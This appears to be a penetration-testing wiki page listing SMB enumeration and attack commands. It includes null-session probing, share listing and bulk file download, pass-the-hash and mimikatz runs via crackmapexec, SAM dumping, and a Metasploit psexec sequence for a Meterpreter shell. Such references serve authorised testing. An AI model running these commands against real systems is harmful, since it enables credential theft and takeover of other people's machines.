SMB Enumeration Tools - TheGetch/Penetration-Testing-Methodology GitHub Wiki
SMB Enumeration Tools
$ ls -lh /usr/share/nmap/scripts/ | grep smb
-rw-r--r-- 1 root root 3355 Oct 12 09:29 smb2-capabilities.nse
-rw-r--r-- 1 root root 3075 Oct 12 09:29 smb2-security-mode.nse
-rw-r--r-- 1 root root 1447 Oct 12 09:29 smb2-time.nse
-rw-r--r-- 1 root root 5238 Oct 12 09:29 smb2-vuln-uptime.nse
-rw-r--r-- 1 root root 45138 Oct 12 09:29 smb-brute.nse
-rw-r--r-- 1 root root 5289 Oct 12 09:29 smb-double-pulsar-backdoor.nse
-rw-r--r-- 1 root root 4840 Oct 12 09:29 smb-enum-domains.nse
-rw-r--r-- 1 root root 5971 Oct 12 09:29 smb-enum-groups.nse
-rw-r--r-- 1 root root 8043 Oct 12 09:29 smb-enum-processes.nse
-rw-r--r-- 1 root root 27274 Oct 12 09:29 smb-enum-services.nse
-rw-r--r-- 1 root root 12097 Oct 12 09:29 smb-enum-sessions.nse
-rw-r--r-- 1 root root 6923 Oct 12 09:29 smb-enum-shares.nse
-rw-r--r-- 1 root root 12527 Oct 12 09:29 smb-enum-users.nse
-rw-r--r-- 1 root root 1706 Oct 12 09:29 smb-flood.nse
-rw-r--r-- 1 root root 7471 Oct 12 09:29 smb-ls.nse
-rw-r--r-- 1 root root 8758 Oct 12 09:29 smb-mbenum.nse
-rw-r--r-- 1 root root 8220 Oct 12 09:29 smb-os-discovery.nse
-rw-r--r-- 1 root root 4982 Oct 12 09:29 smb-print-text.nse
-rw-r--r-- 1 root root 1831 Oct 12 09:29 smb-protocols.nse
-rw-r--r-- 1 root root 63596 Oct 12 09:29 smb-psexec.nse
-rw-r--r-- 1 root root 5190 Oct 12 09:29 smb-security-mode.nse
-rw-r--r-- 1 root root 2424 Oct 12 09:29 smb-server-stats.nse
-rw-r--r-- 1 root root 14159 Oct 12 09:29 smb-system-info.nse
-rw-r--r-- 1 root root 7524 Oct 12 09:29 smb-vuln-conficker.nse
-rw-r--r-- 1 root root 6402 Oct 12 09:29 smb-vuln-cve2009-3103.nse
-rw-r--r-- 1 root root 23154 Oct 12 09:29 smb-vuln-cve-2017-7494.nse
-rw-r--r-- 1 root root 6545 Oct 12 09:29 smb-vuln-ms06-025.nse
-rw-r--r-- 1 root root 5386 Oct 12 09:29 smb-vuln-ms07-029.nse
-rw-r--r-- 1 root root 5688 Oct 12 09:29 smb-vuln-ms08-067.nse
-rw-r--r-- 1 root root 5647 Oct 12 09:29 smb-vuln-ms10-054.nse
-rw-r--r-- 1 root root 7214 Oct 12 09:29 smb-vuln-ms10-061.nse
-rw-r--r-- 1 root root 7344 Oct 12 09:29 smb-vuln-ms17-010.nse
-rw-r--r-- 1 root root 4400 Oct 12 09:29 smb-vuln-regsvc-dos.nse
-rw-r--r-- 1 root root 6586 Oct 12 09:29 smb-vuln-webexec.nse
-rw-r--r-- 1 root root 5084 Oct 12 09:29 smb-webexec-exploit.nse
$ nmap x.x.x.x -v -p 139,445 --script=exampleScript1.nse,exampleScript2.nse
All simple checks:
enum4linux -a x.x.x.x
Brute force guessing for share names:
enum4linux -s /usr/share/enum4linux/share-list.txt x.x.x.x
$ smbmap -H 172.21.0.0 -d [domain] -u [user] -p [password]
$ smbmap -H 172.21.0.0 -d [domain] -u "" -p ""
$ smbclient -L 172.21.0.0
$ smbclient -L x.x.x.x -U ""
$ smbclient //172.21.0.0/tmp
If you have a user name or guest login works:
$ smbclient //windows_server_NETBIOS_NAME/destination_folder -U WINDOWS_USER -I x.x.x.x
or
$ smbclient -L //x.x.x.x -U guest -i x.x.x.x
Recursively list a directory:
$ smbclient \\\\x.x.x.x\\Folder
smb: \> recurse on
smb: \> ls
Recursively get all files in a share:
$ smbget -R smb://x.x.x.x/Folder/ -U Username
python3 /usr/share/doc/python3-impacket/examples/smbclient.py [email protected]
python3 samdump.py SMB x.x.x.x
rpcclient -U "" -N x.x.x.x enumdomusers
Attempt an null connection:
rpcclient -U '' x.x.x.x
$ crackmapexec smb -L
$ crackmapexec x.x.x.x -u Administrator -H [hash] --local-auth
$ crackmapexec x.x.x.x -u Administrator -H [hash] --share
$ crackmapexec smb x.x.x.0/24 -u user -p 'Password' --local-auth -M mimikatz
Attempt an null connection:
$ crackmapexec smb x.x.x.x --pass-pol -u '' -p ''
Attempt an null connection:
$ polenum -u '' -p '' -d x.x.x.x
If you have user credentials, you can use them to get a Meterpreter shell on the machine running smb:
msf6 > use exploit/windows/smb/psexec
msf6 > set RHOSTS x.x.x.x
msf6 > set SMBUser <username>
msf6 > set SMBPass <password>
msf6 > set RPORT <default_is_445>
msf6 > run